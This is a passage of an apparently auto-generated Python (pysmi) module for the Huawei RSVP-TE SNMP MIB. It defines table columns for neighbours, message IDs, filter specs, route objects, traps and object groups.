hwRsvpTeIfAuthLifeTime = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 20), TimeInterval()).setUnits('milliseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfAuthLifeTime.setStatus('current')
hwRsvpTeIfAuthKey = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 21), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 392))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfAuthKey.setStatus('current')
hwRsvpTeIfWindowSize = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 22), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfWindowSize.setStatus('current')
hwRsvpTeNbrTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6), )
if mibBuilder.loadTexts: hwRsvpTeNbrTable.setStatus('current')
hwRsvpTeNbrEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrAddress"))
if mibBuilder.loadTexts: hwRsvpTeNbrEntry.setStatus('current')
hwRsvpTeNbrAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16)))
if mibBuilder.loadTexts: hwRsvpTeNbrAddress.setStatus('current')
hwRsvpTeNbrProtocol = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("ip", 1), ("udp", 2), ("both", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrProtocol.setStatus('current')
hwRsvpTeNbrStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 3), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: hwRsvpTeNbrStatus.setStatus('current')
hwRsvpTeNbrSendersNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 4), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrSendersNumber.setStatus('current')
hwRsvpTeNbrReceiversNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 5), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrReceiversNumber.setStatus('current')
hwRsvpTeNbrHelloEnabled = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 6), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrHelloEnabled.setStatus('current')
hwRsvpTeNbrHelloSrcInstance = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 7), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrHelloSrcInstance.setStatus('current')
hwRsvpTeNbrHelloDstInstance = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 8), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrHelloDstInstance.setStatus('current')
hwRsvpTeNbrHelloLostCounter = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 9), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrHelloLostCounter.setStatus('current')
hwRsvpTeNbrHelloType = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 10), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("request", 1), ("ack", 2), ("none", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrHelloType.setStatus('current')
hwRsvpTeNbrGrCapability = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 11), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrGrCapability.setStatus('current')
hwRsvpTeNbrGrRestartTime = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 12), TimeStamp()).setUnits('milliseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrGrRestartTime.setStatus('current')
hwRsvpTeNbrGrRecoveryTime = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 13), TimeStamp()).setUnits('milliseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrGrRecoveryTime.setStatus('current')
hwRsvpTeNbrGrStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 14), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("normal", 1), ("supporting", 2), ("restarting", 3), ("restartTimerRunning", 4), ("recoveryTimerRunning", 5), ("grEnd", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrGrStatus.setStatus('current')
hwRsvpTeNbrAuthKeyId = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 15), OctetString().subtype(subtypeSpec=ConstraintsUnion(ValueSizeConstraint(0, 0), ValueSizeConstraint(6, 6), ))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrAuthKeyId.setStatus('current')
hwRsvpTeNbrReductionEnabled = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 16), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrReductionEnabled.setStatus('current')
hwRsvpTeNbrReliabilityEnabled = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 17), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrReliabilityEnabled.setStatus('current')
hwRsvpTeMessageIdTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 7), )
if mibBuilder.loadTexts: hwRsvpTeMessageIdTable.setStatus('current')
hwRsvpTeMessageIdEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 7, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrAddress"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeMessageIdEpoch"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeMessageIdNumber"))
if mibBuilder.loadTexts: hwRsvpTeMessageIdEntry.setStatus('current')
hwRsvpTeMessageIdEpoch = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 7, 1, 1), Gauge32())
if mibBuilder.loadTexts: hwRsvpTeMessageIdEpoch.setStatus('current')
hwRsvpTeMessageIdNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 7, 1, 2), Gauge32())
if mibBuilder.loadTexts: hwRsvpTeMessageIdNumber.setStatus('current')
hwRsvpTeMessageIdFlag = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 7, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("senderIncoming", 1), ("senderOutgoing", 2), ("resv", 3), ("resvFwd", 4), ("rtBuff", 5)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeMessageIdFlag.setStatus('current')
hwRsvpTeFilterSpecTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 8), )
if mibBuilder.loadTexts: hwRsvpTeFilterSpecTable.setStatus('current')
hwRsvpTeFilterSpecEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 8, 1), ).setIndexNames((0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionNumber"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeResvNumber"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeFilterSpecNumber"))
if mibBuilder.loadTexts: hwRsvpTeFilterSpecEntry.setStatus('current')
hwRsvpTeFilterSpecNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 8, 1, 1), Gauge32())
if mibBuilder.loadTexts: hwRsvpTeFilterSpecNumber.setStatus('current')
hwRsvpTeFilterSpecLspId = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 8, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeFilterSpecLspId.setStatus('current')
hwRsvpTeFilterSpecIngressLsrId = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 8, 1, 3), OctetString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeFilterSpecIngressLsrId.setStatus('current')
hwRsvpTeFilterSpecLabel = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 8, 1, 4), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeFilterSpecLabel.setStatus('current')
hwRsvpTeRroTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 9), )
if mibBuilder.loadTexts: hwRsvpTeRroTable.setStatus('current')
hwRsvpTeRroEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 9, 1), ).setIndexNames((0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionNumber"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderNumber"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeRroNumber"))
if mibBuilder.loadTexts: hwRsvpTeRroEntry.setStatus('current')
hwRsvpTeRroNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 9, 1, 1), Gauge32())
if mibBuilder.loadTexts: hwRsvpTeRroNumber.setStatus('current')
hwRsvpTeRroType = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 9, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("ipv4", 1), ("ipv6", 2), ("label", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeRroType.setStatus('current')
hwRsvpTeRroIpAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 9, 1, 3), OctetString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeRroIpAddr.setStatus('current')
hwRsvpTeRroIpPrefixLen = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 9, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeRroIpPrefixLen.setStatus('current')
hwRsvpTeRroLabel = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 9, 1, 5), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeRroLabel.setStatus('current')
hwRsvpTeRroFlag = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 9, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeRroFlag.setStatus('current')
hwRsvpTeEroTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 10), )
if mibBuilder.loadTexts: hwRsvpTeEroTable.setStatus('current')
hwRsvpTeEroEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 10, 1), ).setIndexNames((0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionNumber"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderNumber"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeEroNumber"))
if mibBuilder.loadTexts: hwRsvpTeEroEntry.setStatus('current')
hwRsvpTeEroNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 10, 1, 1), Gauge32())
if mibBuilder.loadTexts: hwRsvpTeEroNumber.setStatus('current')
hwRsvpTeEroType = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 10, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("ipv4", 1), ("ipv6", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeEroType.setStatus('current')
hwRsvpTeEroIpAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 10, 1, 3), OctetString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeEroIpAddr.setStatus('current')
hwRsvpTeEroIpPrefixLen = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 10, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeEroIpPrefixLen.setStatus('current')
hwRsvpTeExtendObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 11))
hwRsvpTeExtendTrap = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12))
hwRsvpTeTrapObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 1))
hwRsvpTeNbr = MibScalar((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 1, 1), IpAddress()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: hwRsvpTeNbr.setStatus('current')
hwRsvpTeIfNbrCurrentCount = MibScalar((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 1, 2), Integer32()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: hwRsvpTeIfNbrCurrentCount.setStatus('current')
hwRsvpTeIfNbrThreshold = MibScalar((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 1, 3), Integer32()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: hwRsvpTeIfNbrThreshold.setStatus('current')
hwRsvpTeIfNbrTotalCount = MibScalar((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 1, 4), Integer32()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: hwRsvpTeIfNbrTotalCount.setStatus('current')
hwRsvpTeIfName = MibScalar((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 1, 5), DisplayString()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: hwRsvpTeIfName.setStatus('current')
hwRsvpTeTrap = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 2))
hwRsvpTeHelloLost = NotificationType((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 2, 1)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbr"))
if mibBuilder.loadTexts: hwRsvpTeHelloLost.setStatus('current')
hwRsvpTeHelloLostRecovery = NotificationType((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 2, 2)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbr"))
if mibBuilder.loadTexts: hwRsvpTeHelloLostRecovery.setStatus('current')
hwRsvpTeAuthFail = NotificationType((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 2, 3)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbr"))
if mibBuilder.loadTexts: hwRsvpTeAuthFail.setStatus('current')
hwRsvpTeAuthSuccess = NotificationType((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 2, 4)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbr"))
if mibBuilder.loadTexts: hwRsvpTeAuthSuccess.setStatus('current')
hwRsvpTeIfNbrThresholdExceed = NotificationType((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 2, 5)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfName"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrCurrentCount"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrThreshold"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrTotalCount"))
if mibBuilder.loadTexts: hwRsvpTeIfNbrThresholdExceed.setStatus('current')
hwRsvpTeIfNbrThresholdExceedClear = NotificationType((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 2, 6)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfName"))
if mibBuilder.loadTexts: hwRsvpTeIfNbrThresholdExceedClear.setStatus('current')
hwRsvpTeIfNbrTotalCountExceed = NotificationType((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 2, 7)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfName"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrTotalCount"))
if mibBuilder.loadTexts: hwRsvpTeIfNbrTotalCountExceed.setStatus('current')
hwRsvpTeIfNbrTotalCountExceedClear = NotificationType((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 2, 8)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfName"))
if mibBuilder.loadTexts: hwRsvpTeIfNbrTotalCountExceedClear.setStatus('current')
hwRsvpTeConformance = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2))
hwRsvpTeGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1))
hwRsvpTeSessionGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 1)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionType"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionDestAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionDestAddrLength"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionSenders"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionReceivers"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionRequests"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionTunnelId"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionTunnelExtId"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionLspsNumber"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionStyle"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwRsvpTeSessionGroup = hwRsvpTeSessionGroup.setStatus('current')
hwRsvpTeSenderGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 2)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderType"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderDestAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderDestAddrLength"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAddrLength"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderHopAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderHopLih"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderInterface"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderTSpecRate"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderTSpecPeakRate"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderTSpecBurst"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderTSpecMinTu"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderTSpecMaxTu"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderInterval"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderRsvpHop"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderPolicy"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecBreak"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecHopCount"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecPathBw"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecMinLatency"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecMtu"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecGuaranteedSvc"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecGuaranteedBreak"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecGuaranteedCtot"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecGuaranteedDtot"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecGuaranteedCsum"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecGuaranteedDsum"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecGuaranteedHopCount"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecGuaranteedPathBw"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecGuaranteedMinLatency"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecGuaranteedMtu"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecCtrlLoadSvc"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecCtrlLoadBreak"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecCtrlLoadHopCount"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecCtrlLoadPathBw"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecCtrlLoadMinLatency"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecCtrlLoadMtu"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderTtl"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeLspId"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderMsgIdSndFlag"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderMsgIdSndEpoch"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderMsgIdSndNumber"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderMsgIdRcvFlag"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderMsgIdRcvEpoch"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderMsgIdRcvNumber"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderClassType"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderLabelRequestCtype"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderLabelRequestL3pid"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderLabelRequestAtmMinVpi"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderLabelRequestAtmMinVci"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderLabelRequestAtmMaxVpi"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderLabelRequestAtmMaxVci"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderLabelRequestFrMinDlci"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderLabelRequestFrMaxDlci"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderSessionAttrType"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderSessionAttrSetupPrio"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderSessionAttrHoldPrio"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderSessionAttrFlag"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderSessionAttrName"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderSessionAttrExcludeAny"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderSessionAttrIncludeAny"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderSessionAttrIncludeAll"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderFrrSetupPrio"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderFrrHoldPrio"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderFrrHopLimit"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderFrrFlag"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderFrrBandwidth"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderFrrExcludeAny"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderFrrIncludeAny"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderFrrIncludeAll"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderFrrInuseFlag"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderDiffServPsc"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwRsvpTeSenderGroup = hwRsvpTeSenderGroup.setStatus('current')
hwRsvpTeResvGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 3)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvType"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvDestAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvSenderAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvDestAddrLength"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvSenderAddrLength"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvHopAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvHopLih"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvInterface"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvService"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvTSpecRate"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvTSpecPeakRate"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvTSpecBurst"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvTSpecMinTu"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvTSpecMaxTu"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvRSpecRate"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvRSpecSlack"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvInterval"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvScope"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvShared"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvExplicit"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvRsvpHop"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvPolicy"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvTtl"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvConfirm"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwRsvpTeResvGroup = hwRsvpTeResvGroup.setStatus('current')
hwRsvpTeResvFwdGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 4)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdType"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdDestAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdSenderAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdDestAddrLength"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdSenderAddrLength"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdHopAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdHopLih"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdInterface"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdService"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdTSpecRate"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdTSpecPeakRate"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdTSpecBurst"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdTSpecMinTu"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdTSpecMaxTu"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdRSpecRate"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdRSpecSlack"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdInterval"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdScope"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdShared"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdExplicit"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdPolicy"), 